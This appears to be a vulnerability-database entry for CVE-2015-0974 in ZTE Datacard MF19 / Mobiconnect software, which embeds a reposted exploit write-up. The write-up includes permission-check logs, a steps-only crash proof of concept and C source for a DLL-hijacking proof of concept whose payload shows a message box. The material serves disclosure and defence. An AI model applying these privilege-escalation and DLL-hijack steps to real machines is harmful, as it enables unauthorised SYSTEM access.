VAR-201708-0225

Vulnerability from variot - Updated: 2025-04-20 23:32

Untrusted search path vulnerability in ZTE Datacard MF19 0V1.0.0B04 allows local users to gain privilege by modifying the 'Ucell Internet' directory to reference a malicious mms_dll_r.dll or mediaplayerdll.dll. ZTE Datacard Contains an untrusted search path vulnerability.None. ZTE MF19 has multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to escalate permissions, execute arbitrary code, and perform denial of service attacks. ZTE MF19 is a China Unicom 3G wireless internet card from ZTE Corporation. The following vulnerabilities exist in ZTE MF19: 1. Arbitrary code execution vulnerability 2. Local privilege escalation vulnerability 3. Local denial of service vulnerability. Attackers can use the specially crafted Dynamic Link Library (DLL) files to exploit these vulnerabilities to gain elevated permissions, crash affected devices, and deny service to legitimate users. Vulnerabilities exist in ZTE MF19 using 0V1.0.0B04 firmware, other versions may also be affected. /* * Exploit Title:ZTE Datacard MF19 0V1.0.0B04 (PCW_MOBILISALGV1.0.0B03 mobilis ) Insecure Permissions Local Privilege Escalation & PoC Local crash & DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll) * Date: 1/01/2015 * Author: Hadji Samir s-dz@hotmail.fr * Link soft:http://www.3g.dz/fr/cle_mas/index.php?id_document=2 * Vendor: http://www.zte.com.cn/ http://www.mobilis.dz/entreprises/mobiconnect.php * Tested on: windows 7 FR * Thanks Anna

####################### Insecure Permissions Local Privilege Escalation

Technical Details & Description:

A local privilege escalation vulnerability has been discovered in the official ZTE Datacard mobiconnect application software.

The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the F flag (full) for the Everyone(Tout le monde:F) and Users group, for the all binary file. The files are installed in the Ucell Internet directory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges.

Proof of Concept (PoC):

The vulnerability can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs ---

C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Mobiconnect" C:\Program Files\Mobiconnect Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ALL_ACCESS RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\Syst\xdeme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL

C:\Users\s-dz\Desktop>

C:\Program Files>icacls "Mobiconnect" Mobiconnect Tout le monde:(F) Tout le monde:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) AUTORITE NT\Syst\xe8me:(I)(F) AUTORITE NT\Syst\xe8me:(I)(OI)(CI)(IO)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F) BUILTIN\Utilisateurs:(I)(RX) BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

1 fichiers correctement trait\xe9s\xa0; \xe9chec du traitement de 0 fichiers

2- ########################### PoC Local crash ##########################################################

first go to C:\program files\Internet Mobile\etworkCfg.xml (Network configuration) and write "A" * 3000 in "A" x 3000 . Save it open the program . poc will crash ...........

3-########################DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll)#######################

*/

#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "ZTE DLL Hijacked\Hadji Samir", "POC", MB_OK);
}

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-0225",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mobiconnect",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mobilis",
        "version": "1.0.0b03"
      },
      {
        "model": "mf19 0v1.0.0b04",
        "scope": null,
        "trust": 0.9,
        "vendor": "zte",
        "version": null
      },
      {
        "model": "mobiconnect",
        "scope": null,
        "trust": 0.8,
        "vendor": "atm mobilis",
        "version": null
      },
      {
        "model": "datacard mf190 1.0.0b04",
        "scope": null,
        "trust": 0.6,
        "vendor": "zte",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:mobilis:mobiconnect",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "hadji samir",
    "sources": [
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "PACKETSTORM",
        "id": "129808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2015-0974",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-0974",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-28575",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-00289",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2015-0974",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-0974",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-0974",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-28575",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-00289",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201708-1187",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-0974",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Untrusted search path vulnerability in ZTE Datacard MF19 0V1.0.0B04 allows local users to gain privilege by modifying the \u0027Ucell Internet\u0027 directory to reference a malicious mms_dll_r.dll or mediaplayerdll.dll. ZTE Datacard Contains an untrusted search path vulnerability.None. ZTE MF19 has multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to escalate permissions, execute arbitrary code, and perform denial of service attacks. ZTE MF19 is a China Unicom 3G wireless internet card from ZTE Corporation. \nThe following vulnerabilities exist in ZTE MF19: 1. Arbitrary code execution vulnerability 2. Local privilege escalation vulnerability 3. Local denial of service vulnerability. Attackers can use the specially crafted Dynamic Link Library (DLL) files to exploit these vulnerabilities to gain elevated permissions, crash affected devices, and deny service to legitimate users. Vulnerabilities exist in ZTE MF19 using 0V1.0.0B04 firmware, other versions may also be affected.     /* \n    * Exploit Title:ZTE Datacard  MF19 0V1.0.0B04 (PCW_MOBILISALGV1.0.0B03  mobilis )   Insecure Permissions Local Privilege Escalation \u0026 PoC Local crash  \u0026 DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll)\n    * Date: 1/01/2015\n    * Author: Hadji Samir s-dz@hotmail.fr\n    * Link soft:http://www.3g.dz/fr/cle_mas/index.php?id_document=2\n    * Vendor: http://www.zte.com.cn/  http://www.mobilis.dz/entreprises/mobiconnect.php\n    * Tested on: windows 7 FR\n    * Thanks Anna \n\n\n\n\n############################# Insecure Permissions Local Privilege Escalation ################################################\nTechnical Details \u0026 Description:\n================================\nA local privilege escalation vulnerability has been discovered in the official ZTE Datacard mobiconnect  application software. \n\nThe application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change\nthe executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the `F` flag (full)\nfor the `Everyone`(Tout le monde:F) and `Users` group, for the all binary file. The files are installed in the `Ucell Internet`\ndirectory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change\nby any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. \n\n\n\nProof of Concept (PoC):\n=======================\nThe vulnerability can be exploited by local attackers with restricted account privileges and without user interaction. \nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. \n\n--- PoC Session Logs ---\n   \nC:\\Users\\s-dz\\Desktop\u003eaccesschk.exe -dqv \"C:\\Program Files\\Mobiconnect\"\nC:\\Program Files\\Mobiconnect\n  Medium Mandatory Level (Default) [No-Write-Up]\n  RW Tout le monde\n        FILE_ALL_ACCESS\n  RW NT SERVICE\\TrustedInstaller\n        FILE_ALL_ACCESS\n  RW AUTORITE NT\\Syst\\xdeme\n        FILE_ALL_ACCESS\n  RW BUILTIN\\Administrateurs\n        FILE_ALL_ACCESS\n  R  BUILTIN\\Utilisateurs\n        FILE_LIST_DIRECTORY\n        FILE_READ_ATTRIBUTES\n        FILE_READ_EA\n        FILE_TRAVERSE\n        SYNCHRONIZE\n        READ_CONTROL\n\nC:\\Users\\s-dz\\Desktop\u003e\n\n\nC:\\Program Files\u003eicacls \"Mobiconnect\"\nMobiconnect Tout le monde:(F)\n            Tout le monde:(OI)(CI)(IO)(F)\n            NT SERVICE\\TrustedInstaller:(I)(F)\n            NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\n            AUTORITE NT\\Syst\\xe8me:(I)(F)\n            AUTORITE NT\\Syst\\xe8me:(I)(OI)(CI)(IO)(F)\n            BUILTIN\\Administrateurs:(I)(F)\n            BUILTIN\\Administrateurs:(I)(OI)(CI)(IO)(F)\n            BUILTIN\\Utilisateurs:(I)(RX)\n            BUILTIN\\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE)\n            CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)\n\n1 fichiers correctement trait\\xe9s\\xa0; \\xe9chec du traitement de 0 fichiers\n\n\n\n\n\n2-  ########################### PoC Local crash ##########################################################\n\n\nfirst go to C:\\program files\\Internet Mobile\\etworkCfg.xml (Network configuration)\nand write \"A\" * 3000 in     \u003cConfigFileName\u003e\"A\" x 3000\u003c/ConfigFileName\u003e . Save it open the program . \npoc will crash ........... \n                                                       \n\n\n\n##########################################################################################################\n\n\n3-########################DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll)#######################\n\n    */\n\n    #include \u003cwindows.h\u003e \n\n    BOOL WINAPI DllMain (\n                HANDLE    hinstDLL,\n                DWORD     fdwReason,\n                LPVOID    lpvReserved)\n    {\n        switch (fdwReason)\n    {\n    case DLL_PROCESS_ATTACH:\n    owned();\n    case DLL_THREAD_ATTACH:\n            case DLL_THREAD_DETACH:\n            case DLL_PROCESS_DETACH:\n    break;\n    }\n    return TRUE;\n    }\n\n    int owned() {\n    MessageBox(0, \"ZTE DLL Hijacked\\Hadji Samir\", \"POC\", MB_OK);\n    }\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "db": "PACKETSTORM",
        "id": "129808"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "129808",
        "trust": 3.8
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "71892",
        "trust": 1.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "PACKETSTORM",
        "id": "129808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "id": "VAR-201708-0225",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      }
    ],
    "trust": 2.075
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 1.2
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      }
    ]
  },
  "last_update_date": "2025-04-20T23:32:10.723000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MobiConnect",
        "trust": 0.8,
        "url": "http://www.mobilis.dz/entreprises/mobiconnect.php"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.zte.com.cn/global/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-426",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/129808/zte-datacard-mf19-privilege-escalation-dll-hijacking.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0974"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0974"
      },
      {
        "trust": 0.6,
        "url": "http://packetstormsecurity.com/files/129808/ztedatacard-privescdllhijack.txt"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/71892"
      },
      {
        "trust": 0.3,
        "url": "http://wwwen.zte.com.cn/en/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/426.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://www.3g.dz/fr/cle_mas/index.php?id_document=2"
      },
      {
        "trust": 0.1,
        "url": "http://www.zte.com.cn/"
      },
      {
        "trust": 0.1,
        "url": "http://www.mobilis.dz/entreprises/mobiconnect.php"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "PACKETSTORM",
        "id": "129808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "db": "PACKETSTORM",
        "id": "129808"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "date": "2015-01-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "date": "2017-08-28T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "date": "2015-01-01T00:00:00",
        "db": "BID",
        "id": "71892"
      },
      {
        "date": "2017-10-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "date": "2015-01-05T03:33:33",
        "db": "PACKETSTORM",
        "id": "129808"
      },
      {
        "date": "2015-01-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "date": "2017-08-28T15:29:01.063000",
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-28575"
      },
      {
        "date": "2015-01-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2015-00289"
      },
      {
        "date": "2017-09-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-0974"
      },
      {
        "date": "2015-01-01T00:00:00",
        "db": "BID",
        "id": "71892"
      },
      {
        "date": "2017-10-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007864"
      },
      {
        "date": "2015-01-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      },
      {
        "date": "2025-04-20T01:37:25.860000",
        "db": "NVD",
        "id": "CVE-2015-0974"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      }
    ],
    "trust": 1.5
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZTE MF19 Multiple Security Vulnerabilities",
    "sources": [
      {
        "db": "BID",
        "id": "71892"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201501-147"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-1187"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…